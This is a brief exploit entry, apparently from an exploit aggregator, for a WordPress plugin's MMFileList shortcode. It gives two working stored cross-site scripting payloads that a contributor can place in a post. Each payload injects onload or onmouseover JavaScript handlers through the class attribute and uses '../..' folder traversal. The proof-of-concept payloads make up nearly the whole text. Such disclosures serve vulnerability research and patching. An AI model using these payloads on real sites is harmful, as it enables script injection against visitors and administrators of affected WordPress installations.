## https://sploitus.com/exploit?id=WPEX-ID:365B15E6-3755-4ED5-BADD-C9DD962BD9FA
As a contributor, put the below shortcodes in a post
[MMFileList folder='../../' format='img' class='" onload=alert(/XSS/)//'] (the folder the reach must contain images for the XSS to trigger)
[MMFileList folder='../..' class='" onmouseover=alert(/XSS/)//'] (the XSS will be triggered when moving the mouse over the generated list)